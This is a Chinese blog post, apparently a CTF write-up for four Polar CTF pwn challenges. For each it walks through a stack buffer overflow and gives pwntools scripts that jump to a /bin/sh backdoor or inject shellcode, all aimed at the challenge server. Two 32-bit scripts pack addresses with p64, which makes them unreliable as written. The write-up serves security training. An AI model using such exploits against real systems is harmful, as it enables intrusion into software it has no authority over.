Polar PWN内容WP 三

最新推荐文章于 2024-06-17 10:40:08 发布
原创 最新推荐文章于 2024-06-17 10:40:08 发布 · 2k 阅读 · 30 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #安全 #安全性测试 #系统安全 #网络安全 #计算机网络

本文描述了一系列关于32位和64位程序的黑客攻击案例,涉及nx保护、溢出漏洞利用、寻找后门函数以及使用shellcode实现远程执行的过程。通过IDA进行分析并利用pwn技术在不同的环境中执行payload获取flag。

九、你是大佬还是菜鸡?

老规矩查看一下文件

64位开启nx保护

进入ida查看一下

有两个函数,一个叫dalao,一个叫caiji

输入1进入大佬函数,输入2进入菜鸡函数,先进去大佬函数看一下

淦,被骂了;进入菜鸡函数看一下

一个溢出漏洞,shift+F12查找字符串

有bin/sh

跟踪一下发现一个标准的后门函数

思路:输入2进入菜鸡函数,然后利用溢出跳到后门函数位置

编写

from pwn import *
r =remote("120.46.59.242", 2097)
bin_sh=0x4008B0
padding=0x20+8
r.sendlineafter(b'2. Cai Ji\n',b'2')
payload=b'a'*padding+p64(bin_sh)
r.sendline(payload)
r.interactive()

然后cat flag即可

十、Easy_ShellCode

老规矩查看一下文件

32位没有任何保护

IDA~启动!

main函数中有一个Start函数,直接进入Start函数查看 (main内容不截图了)

有两次写入的地方,shift+F12查看字符串

没有任何bin/sh cat flag的迹象

思路:通过第一次写入向栈中写入shellcode,通过第二次写入造成溢出跳回写入第一次shellcode的位置

第一次写入是str变量,双击str变量找到str开始写入的位置

记录一下 str_addr=0x804A080

然后偏移量 0x68+4

编写脚本

from pwn import *
r =remote("120.46.59.242", 2052)
​
shellcode=asm(shellcraft.sh())
str_addr=0x804A080
padding=0x68+4
r.recvuntil("Please Input:\n")
r.sendline(shellcode)
r.recvuntil("What,s your name ?:\n")
payload=b'a'*padding+p64(str_addr)
r.sendline(payload)
r.interactive()

cat flag即可

十一、小狗汪汪汪

查看一下

32位开启nx保护

ida启动

打开查看main函数后有一个dog函数,直接进入dog函数查看

标准,太标准了 一个完美的溢出。shift+F12查看字符串

艾玛,这也有。跟踪一下

后门函数

思路:利用dog函数中的溢出跳到getshell函数

编写

from pwn import *
r =remote("120.46.59.242", 2078)
​
bin_sh=0x804859B
padding=0x9+4
payload=b'a'*padding+p64(bin_sh)
r.sendline(payload)
r.interactive()

然后cat flag即可

十二、play

查看

ida

main里有一个play函数,直接进入play函数

两次写入,第一次red 第二次gets

溢出漏洞

shift+F12

没有后门函数

思路:同第十题一样,利用第一次red写入后门函数,第二次gets溢出跳转到后门函数中(没有开NX保护)

记录一下第一次写入的buf地址:0x6010A0

记录偏移量:0x30+8

编写脚本

from pwn import *
r =remote("120.46.59.242", 2064)
​
context(arch='amd64',os='linux')
shellcode=asm(shellcraft.sh())
padding=0x30+8
bss_addr=0x6010A0
​
r.recvuntil("I think you must enjoy playing.\n")
r.sendline(shellcode)
payload=b'a'*padding+p64(bss_addr)
r.sendline(payload)
r.interactive()
​

cat flag即可

PolarCTF 2024冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北话是最好的语言
2401_87298847的博客
09-22 1132
在第个与第四个红框处,根据用户输入的size值来开辟相应的内存空间,随后note内容被存入该空间.bss段中notelist处空间情况如下图所示(2)然后,查看del_note()函数该函数根据用户输入的 Index 值来确定删除哪一个note,第二个红框中,对存放note和puts函数的内存空间都进行了释放,但没有将指针置空,存在漏洞可以发现,题目给出的程序存在后门函数magic,通过执行该函数可以获取flag。
【Web】记录Polar靶场<简单>难度题一遍过(全)
最新发布
m0_74824802的博客
12-25 1363
明天XYCTF开始,今天干啥也不是,过过签到八股吧。
Polar PWN内容WP
pythonZLX的博客
06-17 838
先去下载文件,然后导入到虚拟机中file和checksec一下可以看到是64位程序,并且同时开启了金丝雀和NX保护我们将程序放进IDA中查看一下源码有一个很明显的后门函数,但是需要一些条件在我们运行程序的时候会问我们是不是喜欢小猫,此时有两个选项其实不管输入哪个都无法触发后门函数,因为输入的内容是在buf变量中,而参与判断的是s2变量。我们发现buf变量定义是32个而read可输入的是40个,所以这里有溢出点buf到s2的距离是0x50-0x30。
Polar PWN内容WP
pythonZLX的博客
03-18 2344
下载文件放入虚拟机中查看一下32位ELF文件,开启栈不可执行保护(NX)放入IDA中看一下映入眼帘的就是一个flag函数,直接看一下flag函数中的内容好嘛!cat flag 思路明确了接着我们进入main函数中出现的yes函数,查看一下yes函数中的内容一个栈溢出,read写入的是100个字节,远远超出定义的58字节利用溢出,返回cat flag思路有了计算偏移地址偏移地址:0x58+4找出flag函数地址差不多了,开搞!​运行脚本后得到flag。
Polar PWN内容WP
pythonZLX的博客
03-17 1768
NX保护机制:将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。Stack保护机制:在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致。我们继续,将程序丢入IDA64中查看一下main函数发现一个叫box的函数,进去看一看。
PolarCTF】 PWN_test_format
2301_76148382的博客
10-12 320
4.根据所得到的结果从前往后数,到Canary是第7位,考虑到还需要输入格式化字符串来泄露Canary,所以可以得到Cannary的偏移为6​​。因此可通过%6$n​​来修改n​​的值,将变量n​​的值修改为int​​字节数,即满足n​​的值为数值4​​,进而拿到权限。需要去调试到Canary位置的偏移量,通过格式化字符串漏洞修改n​的值为​4​。如果变量​n​和数值​4​相等,则程序调用​Shell()​函数。3.x/16wx $esp:以16进制查看​esp​处的参数。
polar3d_维极坐标图_
09-30
标题中的“polar3d”显然是一种扩展功能,用于在MATLAB中生成维极坐标图。 在描述中提到,这个函数是针对MATLAB原生不支持维极坐标图的问题而特别设计的。这意味着开发者可能通过自定义函数或利用MATLAB的底层...
polar代码MATLAB (1).rar_Matlab代码_Polar码_polar_polar coding_sc译码
07-14
Polar码是一种新兴的前向纠错编码(Forward Error Correction,FEC)技术,由土耳其科学家艾尔达尔·阿里坎在2008年提出。它利用信道极化效应,能够在理论上实现接近香农限的编码效率,尤其适用于低信噪比环境下的...
polar_SC译码.rar_FPGA polar code_polar FPGA_polar码 FPGA_polar码译码_
07-14
该部分的主要功能是完成基于FPGA的polar码SC译码。
polar靶场通关笔记
weixin_43296565的博客
06-06 8150
这里是关于自己打polar靶场的小笔记
polarctf靶场【web】session文件包含、自由的文件上传系统、爆破、XFF、 rce1、iphone、ezupload
m0_73981089的博客
04-26 3046
session文件包含、文件包含、XXF伪造、rce、UA的修改、文件上传漏洞、爆破
Polar靶场做题 —— test_format
2301_76262491的博客
10-12 791
PolarD&N_pwn_test_format
Polar D&N Misc 大礼包 题解
qq_43123822的博客
10-15 788
1.根据加密压缩包的注释得出密码是6位以上,用ARCHPR工具限定纯数字,7-8位爆破得到密码“9635421”。5.用key=2的栅栏密码解密后发现格式正确了,但是具体的字符不对,那就考虑一下凯撒密码。Polar D&N靶场,CTF题目多样,题目完全原创,不定期开展各种赛事,欢迎各位来刷题!4.再拿base64进行解码,能看出和正常flag格式不同,那就再拿栅栏密码解密。6. 当key=13时,能发现所有的条件都满足了,直接提交flag,然后就C了!打开该图片,在文件末尾可看到一串base32编码。
polarctf靶场 【web】签到题、简单 rce、蜜雪冰城吉警店、到底给不给flag呢
m0_73981089的博客
04-24 3629
此时注意GET数组的值,$ _GET["flag"]=Polar​,而经过$_POST​的变量覆盖,​$ _GET =array(1) { ["flag"]=> string(4) "flag" } ​,故而最开始传GET参数时?并且value不能等于flag,若想输出执行到最后输出flag,那么变量覆盖时候不能将$flag 的值等于除flag 外的任意值,也就是说在foreach内的变量覆盖过程,需要实现。这样被解析之后,就是c=flag&flag=c。方法二:字符串转义绕过;
Polar靶场 PHP是世界上最好的语言_polar靶场 苦海(1),最终入职阿里
m0_60567796的博客
04-18 703
直接出结果,可我认为这个做法存在一定的运气,因为正则里面过滤了 ’ 和 " ,这就导致system(‘cat f*’)无法执行,因此我想到了用无参rce。pos(array_reverse(getallheaders()))是输出数组第一个键的键值,即39.188.154.214。接下来就是绕过if(isset($_POST[‘504_SYS.COM’])),这里要注意的是PHP里的非法传参。这里我是利用sys=eval(pos(array_reverse(getallheaders())));
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值